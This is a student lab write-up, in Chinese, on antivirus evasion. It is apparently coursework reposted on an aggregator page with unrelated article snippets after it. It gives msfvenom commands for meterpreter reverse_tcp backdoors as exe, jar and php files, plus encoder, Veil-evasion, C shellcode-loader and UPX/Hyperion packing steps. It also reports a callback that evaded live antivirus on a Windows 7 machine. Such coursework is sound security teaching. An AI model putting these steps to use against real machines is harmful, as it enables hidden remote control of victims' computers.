2018-2019 20165208 网络对抗 Exp3 免杀原理与实践

目录

  • 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践
    • 实验内容
    • 基础问题回答
    • 实践过程记录
      • 任务一:正确使用免杀工具或技巧
      • 任务二:通过组合应用各种技术实现恶意代码免杀
      • 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
    • 开启杀软能绝对防止电脑中恶意代码吗?
    • 实验中遇到的问题及解决方法
    • 实验总结与体会

2018-2019 20165208 网络对抗 Exp3 免杀原理与实践

实验内容

  • 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)

  • 通过组合应用各种技术实现恶意代码免杀(0.5分)(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

  • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)

基础问题回答

1. 杀软是如何检测出恶意代码的?

  • 通过特征码:通过检索文件中是否包含恶意代码MAL里有并且其他软件没有的特征码。
  • 启发式:通过片面特征去判断。(不保证精确性)
  • 基于行为:通过对恶意代码的观察研究,发现某些特定的行为可能是恶意代码的行为。杀软在监视程序运行的过程中,如果发现了这些特殊行为,就会认为其是恶意软件。

2. 免杀是做什么?
通过一些特定的操作,使恶意代码不易被杀毒软件所发现。例如伪装,加密,对shellcode进行变形,利用veil进行重写重编译。

3. 免杀的基本方法有哪些?

  • 改变特征码
    • 只有EXE的情况下:加壳(压缩壳、加密壳)
    • 有shellcode的情况下:用encode进行编码,基于payload重新编译生成可执行文件。
    • 有源代码:用其他语言进行重写再编译。
  • 改变行为
    • 通讯方式:尽量使用反弹式连接、使用隧道技术、加密通讯数据。
    • 操作模式:基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码。
  • 非常规行为
    • 使用一个有漏洞的应用作为后门,编写攻击代码集成到如MSF中
    • 使用社工类攻击,诱骗目标关闭AV软件
    • 纯手工打造一个恶意软件

实践过程记录

任务一:正确使用免杀工具或技巧

1、 使用msf编码器,msfvenom生成如jar之类的其他文件。

msf编码器

Msfvenom是Metasploit平台下用来编码payloads免杀的工具。以Metaspliot的知名度和普及度。理所当然,所有AV厂家都盯着呢,一有新编码算法,马上就得加到特征库里呀。
编码后呢,按理论上讲,编码会降低检出率,大不了多编码几次,总会检不出来。

  • 编码一次命令如下(用-e参数编码):
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.235.128 LPORT=5208 -f exe > met-encoded.exe
    image
  • 放去virscan扫描,28款杀软检测出了病毒。(注:由于学号涉及virscan的屏蔽词,所以检测文件名部分进行了更改)
    image

  • 编码十次命令如下(用-i参数指定编码次数):msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.235.128 LPORT=5208 -f exe > 20165208_back2.exe
    image
  • 再放去扫描,27款杀软检测出了病毒,效果不大
    image

jar文件
  • 生成.jar文件夹
    msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.235.128 lport=5208 x> 20165208_backdoor_java.jar
    image
  • 六款软件检测出了病毒,优秀!
    image
php文件
  • msfvenom生成php文件:
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.235.128 lport=5208 x> 20165208_backdoor.php
    image
  • 生成php文件后,只有一款软件查出了问题!出乎意料!
    image

2、使用veil-evasion

由于安装一直出现问题,在尝试几次无解后拷贝了同学的虚拟机。。。

  • 在终端中使用veil命令进入应用 > 输入use evasion进入veil-evasion
    image
    image
  • 然后设置回连IP(此处IP是kali)和端口,输入generate生成文件,接着输入你想要payload的名字:veil_c_5208
    输入use c/meterpreter/rev_tcp.py
    image

  • 设置反弹连接IP,命令为:set LHOST 192.168.235.128,注意此处的IP是KaliIP;
  • 设置端口,命令为:set LPORT 5208
    image

  • 输入generate生成文件,接着输入你想要playload的名字:veil_c_5208
    image
    image
  • 放去扫描,15款杀软检测出了病毒
    image

3、 半手工注入Shellcode并执行

  • 首先使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.235.128 LPORT=5208 -f c用c语言生成一段shellcode;
    image
  • 创建一个文件20165208.c,然后将unsigned char buf[]赋值到其中,代码如
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
此处省略
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";int main()
{int (*func)() = (int(*)())buf;func();
}

image

  • 使用命令:i686-w64-mingw32-g++ 20165208.c -o 20165208.exe编译这个.c文件为可执行文件;
    image
  • 检测结果如下图,有13款杀软发现了问题
    image
  • 移到windows上执行该程序时,被电脑的360卫士查杀。
    image

4、 应用加壳工具


加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。

加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。

加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。

这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。
MSF的编码器使用类似方法,对shellcode进行再编码。

在技术上分壳分为:

  • 压缩壳(减少应用体积,如ASPack,UPX)
  • 加密壳(版权保护,反跟踪。如ASProtect,Armadillo)
  • 虚拟机(通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect,Themida)
使用压缩壳(UPX)
  • 给之前的20165208.exe加个壳得到ky_upxed.exe:
    image
  • 扫描一下,16款软件发现了问题
    image
使用加密壳(Hyperion)
  • 进入目录 /usr/share/windows-binaries/hyperion/中;
  • 输入命令wine hyperion.exe -v ky.upxed.exe ky.upxed.Hyperion.exe进行加壳:
    image
  • 再去扫一遍,更多了。。。
    image

任务二:通过组合应用各种技术实现恶意代码免杀

  • 通过组合半手工制作shellcode,压缩壳,加密壳达到了免杀的目的
  • 任务截图如下:
    image
    image

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

注意:由于换了网络,IP地址会发生变化,shellcode一定要重新生成!!!

免杀方法:先用msfvenom生成shellcode,再使用压缩壳加壳。
实验环境:对方电脑为 win7主机,腾讯电脑管家13.0.19837.233
image

开启杀软能绝对防止电脑中恶意代码吗?

不能!!!!!你看实验中仅仅做到UNX加壳,49款软件中就只有1款发现了它。
但是在实验中我们注意到360杀毒这个流氓软件云上传这个功能也是相当狂拽酷炫了。。。起初我们的UPX加壳完全木得问题,但是我们没有关云计划。。。然后我们看到了这个。。。
image
然后第一次我们运行还是会被免杀的UNX文件,第二次就凉了。。。。

实验中遇到的问题及解决方法

1、实验中不止一次出现了虚拟机IP地址显示为127.0.0.1的情况,无法ping通也无法上网。
image
解决方法:实验最初出现了这个问题,考虑到可能是在做另一门实验对VMware虚拟机网络进行了设置,查了下网上的解决方法。
image

不过很遗憾没有成功,后来我又尝试了自己对桥接、NAT模式进行了设置,也没有效果。。。于是选择了还原默认设置,在进行重启。
image
第一次的问题解决了。
image
不过在我和同学的虚拟机打算相连时,又一次的出现了上述的问题。我按照之前的操作步骤来不好使了。后来是在将网络设置改成Nat模式重启,再转为桥接模式!!!!一定要注意这个时候不要重启!!!然后就可以了。心疼无数次重启无数次失败的自己。。。

实验总结与体会

本次实验通过利用一些工具实现了病毒的免杀,不得不说我在看到转换为php文件后就只有一款杀毒软件发现了它的时候我是震惊的!!!不过在我的主机上php文件没有找到可以打开的方式。除此之外在学习其他免杀方法时,我尝试了捆绑压缩并隐藏,虽然失败了,但是也是头一次发现了压缩包还可以有这么多设置,以后解压缩文件也不是很放心了。

听了这么多节课,也做了好多次实验,我发现对于计算机水平不错的人来说,编写个病毒真的是很容易了,而且我想象中的杀软也会有漏洞,感觉之前会觉得不容易碰到的木马病毒,其实不需要什么功夫就可以入侵你的电脑了。所以我们除了基础防范,一定要在官方渠道下载软件,即时更新杀软版本,病毒库的更新真的很主要。

转载于:https://www.cnblogs.com/KY-high/p/10630244.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/394468.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

k均值例子 数据挖掘_人工智能、数据挖掘、机器学习和深度学习的关系

一、人工智能人工智能是计算机科学的一个分支,它企图了解智能的实质,并生产出一种新的能以人类智能相似的方式做出反应的智能机器。实际应用比如:机器视觉,指纹识别,人脸识别,视网膜识别,虹膜识…

软件系统换服务器地址,天正软件客户端修改服务器地址

天正软件客户端修改服务器地址 内容精选换一换如果IP经过NAT/WAF,则只能获取到NAT/WAF转化后的IP地址,无法获取到NAT/WAF前的IP地址。如果客户端为容器,只能获取到容器所在主机的IP地址,无法获取容器的IP。四层监听器(TCP/UDP)开启…

选中下拉列表显示全部数据_小白都能学会的多级下拉列表,让你的Excel效率提升百倍...

私信回复关键词【工具】,获取Excel高效小工具合集!让你的Excel效率开挂~你有没有遇到过这样的场景?收集上来的各部门工作进度表,里面的答案五花八门。即使在表头上进行提示规范,手动输入也十分低效。有没有什么办法能够…

lightgbm 数据不平衡_不平衡数据下的机器学习(下)

本文从不平衡学习的基础概念和问题定义出发,介绍了几类常见的不平衡学习算法和部分研究成果。总体来说,不平衡学习是一个很广阔的研究领域,但受笔者能力和篇幅的限制,本文仅对其中部分内容做了简单概述,有兴趣深入学习…

netty实现高性能文件服务器,通用文件服务组件(Netty实现版本)

本文所述文件服务组件在笔者此前一篇文章中已有阐述(基于netty的文件上传下载组件),不过本文将基于之前这个实现再次进行升级改造,利用基于注解的方式进行自动装配。1. 简介1.1 Netty简介Netty是一个异步事件驱动的网络应用程序框架,用于快速…

PHP 小数点保留两位【转】

最近在做统计这一块内容&#xff0c;接触关于数字的数据比较多&#xff0c; 用到了三个函数来是 数字保留小数后 N 位&#xff1b; 接下来简单的介绍一下三个函数&#xff1a; 1、number_format echo number_format("5000000")."<br>"; echo number_…

华为杯数学建模2020获奖名单_我校在2020年全国大学生数学建模竞赛中再获佳绩(内附获奖名单)...

# 近日&#xff0c;从全国大学生数学建模竞赛组委会获悉&#xff0c;我校在2020年全国大学生数学建模竞赛中获得5项国家二等奖。国家奖获奖数量在全国农林院校中并列排名第二。在黑龙江省高校中位居第三名。1你的喜悦&#xff0c;我们的欣慰# 2020年全国大学生数学建模竞赛于9月…

fn映射 mac 键盘_【新鲜评测】高颜值、低延迟、多模式跨平台办公神器-米物蓝牙键盘...

首先&#xff0c;要例行感谢糖纸众测&#xff0c;感谢麻麻酱给我这次评测机会。大家可以微信搜索【糖纸】小程序免费体验更多科技产品。小米旗下生态链公司米物最近出了一款蓝牙双模键盘&#xff0c;它作为一个85全键键盘&#xff0c;可以完成蓝牙和USB转换&#xff0c;以及PC和…

小程序 input 换行_小程序 input双向数据绑定

小程序 双向绑定数据&#xff08;单个&#xff09;<小程序 双向绑定数据&#xff08;多个&#xff09;<

Suricata的初始化脚本

见官网 https://suricata.readthedocs.io/en/latest/initscripts.html

jpa在自己创建表的是字段名不一致_用 数据透视表 完成 Excel多表合并

一般情况下&#xff0c;数据透视表只能汇总一个表格中的数据。即使使用多区域汇总&#xff0c;也只能对多表的单列内容进行数据汇总&#xff0c;而多列却无法实现。前段时间也推送过Power Query的方法&#xff0c;但它有版本限制。而今天宏兴会计培训小编推送的是一个通用的多表…

使用栈实现队列 Implement Queue using Stacks

为什么80%的码农都做不了架构师&#xff1f;>>> 问题&#xff1a; Implement the following operations of a queue using stacks. push(x) -- Push element x to the back of queue.pop() -- Removes the element from in front of queue.peek() -- Get the front…

550什么意思_研报翻译官第二期:带你了解什么是CPI

欢迎收看“第二期”研报翻译官&#xff0c;临近年末&#xff0c;各类金融研报接踵而至&#xff0c;我们也常会看到GDP、CPI、PPI这类字眼。过年回家跟亲戚朋友唠嗑的时候&#xff0c;如果不扯上几句CPI或PPI&#xff0c;都显自己得不够专业。听你们吹牛&#xff0c;我炒菜都有劲…

jieba库的使用

jieba库的使用: jieba库是一款优秀的 Python 第三方中文分词库&#xff0c;jieba 支持三种分词模式&#xff1a;精确模式、全模式和搜索引擎模式&#xff0c;下面是三种模式的特点。 精确模式&#xff1a;试图将语句最精确的切分&#xff0c;不存在冗余数据&#xff0c;适合做文…

mysql结果集相减_MySQL_(Java)使用JDBC向数据库发起查询请求

课程相关链接&#xff1a;JDBC编程和MySQL数据库课程源代码在文章末尾~Java Database Connectivity简单来说就是使用Java里面提供的一些类和方法&#xff0c;利用程序链接数据库&#xff0c;进行增删改查操作。这个过程就叫做JDBC编程接下来我们便分五步通过JDBC对MySQL中的数据…

在双系统(Windows与Ubuntu)下删除Ubuntu启动项

问题概述&#xff1a;因为在自己学习Linux的时候&#xff0c;按照网上的教程错误的删除了Ubuntu的一个内核驱动&#xff0c;导致Ubuntu不能启动。我想到的办法是重新安装系统&#xff0c;重装系统的第一步便是将Ubuntu从电脑中卸载。该笔记是有关如何删除Ubuntu启动项的。 使用…

神舟笔记本bios_海尔雷神(蓝天)神舟战神游戏本风扇狂转掉电大写灯狂闪维修实例...

昨天收到一台网友寄过来的海尔雷神游戏本。说到这个游戏本品牌&#xff0c;其实有几个品牌的笔记本&#xff0c;它们的主板和模具是一模一样的&#xff0c;也就是我们看到的品牌log不一样而已。比如神舟的战神 &#xff0c;机械师&#xff0c;机械革命&#xff0c;麦本本等等。…

“康园圈--互联网+校园平台“项目之成果展示及项目总结

一、总体效果&#xff08;ipad端截图&#xff09; 网站前台页面网站后台管理台页面二、前台访问链接&#xff08;用pc访问效果最佳&#xff09;&#xff1a;http://www.liangzhilin.cn:9100/kangyuanquan/ &#xff08;为保证数据安全&#xff0c;后台管理链接不对外公开&#…

java中二进制怎么说_面试:说说Java中的 volatile 关键词?

volatile 这个关键字可能很多朋友都听说过&#xff0c;或许也都用过。在 Java 5 之前&#xff0c;它是一个备受争议的关键字&#xff0c;因为在程序中使用它往往会导致出人意料的结果。在 Java 5之后&#xff0c;volatile 关键字才得以重获生机。volatile 关键字虽然从字面上理…

类的详解

面向对象是一种编程方式&#xff0c;此编程方式的实现是基于对类和对象的使用。类是一个模板&#xff0c;模板中包装了多个“函数”供使用&#xff08;可以讲多函数中公用的变量封装到对象中&#xff09;。对象&#xff0c;根据模板创建的实例&#xff08;即对象&#xff09;&a…